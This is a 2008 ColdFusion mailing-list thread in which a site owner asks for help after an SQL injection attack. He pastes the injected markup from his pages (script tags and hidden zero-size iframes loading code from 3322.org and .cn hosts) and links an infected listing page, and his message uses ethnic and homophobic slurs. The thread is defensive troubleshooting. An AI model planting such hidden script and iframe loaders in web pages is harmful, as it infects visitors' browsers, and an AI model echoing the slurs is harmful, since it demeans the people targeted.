was sql injection, and jerry has been helpin me offline. its fixed now, how do i get it off the red list?
:( -- tony Better than a thousand hollow words, is one word that brings peace. -- siddhartha gautama On Wed, Sep 3, 2008 at 12:06 AM, Zaphod Beeblebrox <[EMAIL PROTECTED]> wrote: > that looks like a source .cfm file has been corrupted to me. If it were a > data issue, I don't think you'd see the iframe wrapping the original > content. > > my manager had a similar problem right after they had the sql injection > issue. Somehow the hackers were able to get into the .cfm files and inject > code into the index.cfm files themselves. > > > On Tue, Sep 2, 2008 at 10:44 PM, Kelly <[EMAIL PROTECTED]> wrote: > >> sounds like a sql injection. make sure all you are using CFQUERYPARAM >> on your queries. >> The code is most likely coming from your database so it must not be >> completely clean yet if you're still seeing it on the page. >> >> Tony wrote: >> > this is a URL you can view the code on >> > >> > http://www.salisburyhousing.com/viewListings.cfm?step=2&id=106 >> > >> > and dont worry, it will try to do something and break your browser and >> > install something but it doesnt do anything from what i can tell :) >> > you have been warned tho. >> > >> > -- tony >> > >> > Better than a thousand hollow words, is one word that brings peace. >> > -- siddhartha gautama >> > >> > >> > >> > On Tue, Sep 2, 2008 at 10:58 PM, Tony <[EMAIL PROTECTED]> wrote: >> > >> >> a site of mine has been hacked. >> >> they dropped a file in the www root of >> >> the site, and infected the database with >> >> bad data. ive cleand everything i can find >> >> in the data, its all gone... BUT when i view >> >> the pages... i get this in the code: >> >> >> >> <script src="http://jjmaobuduo.3322.org/csrss/w.js";> >> >> </script> >> >> <iframe width="0" scrolling="no" height="0" frameborder="0" >> >> src=" >> http://count41.51yes.com/sa.aspx?id=419214144&refe=http%3A//www.salisburyhousing.com/listings.cfm%3Fshow%3Dstudent&location=http%3A//www.salisburyhousing.com/viewListings.cfm%3Fstep%3D2%26id%3D26&color=32x&resolution=1280x1024&returning=0&language=undefined&ua=Mozilla/5.0%20%28Windows%3B%20U%3B%20Windows%20NT%206.0%3B%20en-US%3B%20rv%3A1.8.1.16%29%20Gecko/20080702%20Firefox/2.0.0.16 >> " >> >> vspace="0" hspace="0" marginheight="0" marginwidth="0"> >> >> </iframe> >> >> <iframe width="0" height="0" src="http://www0.douhunqn.cn/csrss/new.htm >> "> >> >> </iframe> >> >> <script src="http://jjmaoduo.3322.org/csrss/w.js";> >> >> >> >> under any of the property images. trouble is i cant find this shit >> >> anywhere. ANYWAY >> >> seems that some CHINESE FUCKS at http://www.51yes.com are sending >> FAGGOT FUCK >> >> faces out to infect our shit, then get traffic from it... and i guess >> >> somehow make money from >> >> it. anyway... anyone have any idea what the fuck i should do? >> >> >> >> sorry for the profanity, im so damn sick to my stomache. >> >> >> >> -- tony >> >> >> >> Better than a thousand hollow words, is one word that brings peace. >> >> -- siddhartha gautama >> >> >> >> >> > >> > >> >> > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get the Free Trial http://ad.doubleclick.net/clk;203748912;27390454;j Archive: http://www.houseoffusion.com/groups/CF-Community/message.cfm/messageid:267544 Subscription: http://www.houseoffusion.com/groups/CF-Community/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.5
